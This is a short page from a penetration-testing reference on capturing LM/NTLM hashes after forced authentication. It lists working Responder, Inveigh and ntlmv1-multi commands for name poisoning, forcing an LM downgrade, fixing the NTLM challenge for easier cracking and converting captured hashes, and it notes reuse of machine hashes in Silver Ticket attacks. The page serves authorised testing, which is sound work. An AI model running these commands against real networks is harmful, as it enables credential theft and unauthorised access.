Capture

Theory

After successfully forcing a victim to authenticate with LM or NTLM to an attacker's server, the attacker can try to recover credentials by capturing and cracking the hash (LM or NTLM hash, a.k.a. response) sent by the victim.

Practice

NTLM capture can be combined with any forced authentication attack. Testers should dissociate the name poisoning features that Responder and Inveigh offer from their capturing features. Those tools can be combined with others offering different "authentication forcing" attacks (like IPv6 + name poisoning, MS-RPRN abuse and so on).
โ€‹Responder (Python) and Inveigh (Powershell) are great tools able to do name poisoning for forced authentication attacks, but also able to capture responses (LM or NTLM hashes) by starting servers waiting for incoming authentications. Once those listening servers are up and ready, the tester can initiate the forced authentication attack.
In order to help the later cracking process, testers need to set the NTLM challenge sent to victims to 1122334455667788.
For Inveigh, it can be defined with a command-line argument. For Responder, testers need to edit the configuration file.
1
sed -i 's/ Random/ 1122334455667788/g' /PATH/TO/Responder/Responder.conf
Copied!
Responder
Inveigh
Start poisoning LLMNR, NBTNS and mDNS, enable answers for NetBIOS wredir and domain suffix queries, and try to force LM hashing downgrade (this will allow to downgrade to the weakest authentication protocol accepted).
1
responder --interface eth0 --wredir --NBTNSdomain --wpad --lm
Copied!
Testers should always try to force a LM hashing downgrade with Responder (--lm option). LM and NTLMv1 responses (a.k.a. LM/NTLMv1 hashes) from Responder can easily be cracked with crack.sh. The ntlmv1-multi tool (Python) can be used to convert captured responses to crackable formats by hashcat, crack.sh and so on.
1
ntlmv1-multi --ntlmv1 SV01$::BREAKING.BAD:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:AD1235DEAC142CD5FC2D123ADCF51A111ADF45C2345ADCF5:1122334455667788
Copied!
Machine account NT hashes can be used with the Silver Ticket technique to gain admin access to it.
Start poisoning LLMNR, NBT-NS and mDNS with a custom challenge, enable HTTPS capturing, enable proxy server authentication captures
1
Invoke-Inveigh -Challenge 1122334455667788 -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y
Copied!
Last modified 22d ago
Copy link